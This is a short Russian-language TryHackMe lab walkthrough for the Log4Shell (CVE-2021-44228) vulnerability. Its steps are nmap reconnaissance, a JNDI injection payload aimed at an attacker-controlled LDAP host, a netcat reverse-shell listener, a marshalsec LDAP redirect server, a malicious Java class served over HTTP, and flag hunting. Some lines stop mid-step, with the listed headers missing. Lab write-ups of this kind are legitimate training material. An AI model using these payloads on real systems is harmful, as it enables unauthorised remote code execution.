
Пошаговое прохождение TryHackMe по эксплуатации уязвимости Log4Shell (CVE-2021-44228) для достижения удаленного выполнения кода и получения флагов.
Платформа: TryHackMe Сложность: Средняя Тема: Log4Shell (Уязвимость Log4j)
Эксплуатировать уязвимость Log4j (CVE-2021-44228) для получения удаленного выполнения кода и захвата флагов.
nmap -sC -sV <TARGET_IP>
Уязвимость Log4j позволяет внедрение JNDI:
${jndi:ldap://<ATTACKER_IP>:1389/a}
Если ввод попадает в лог — уязвимость существует.
nc -lvnp 4444
git clone https://github.com/mbechler/marshalsec
cd marshalsec
mvn clean package
Запуск LDAP-сервера:
java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389
python3 -m http.server 8000
Создайте вредоносный Java-класс (Exploit.class)
Вставьте полезную нагрузку в уязвимое поле:
${jndi:ldap://<ATTACKER_IP>:1389/Exploit}
💡 Используйте заголовки, такие как:
После запуска:
Проверьте:
sudo -l
Ищите:
find / -name flag.txt 2>/dev/null
cat flag.txt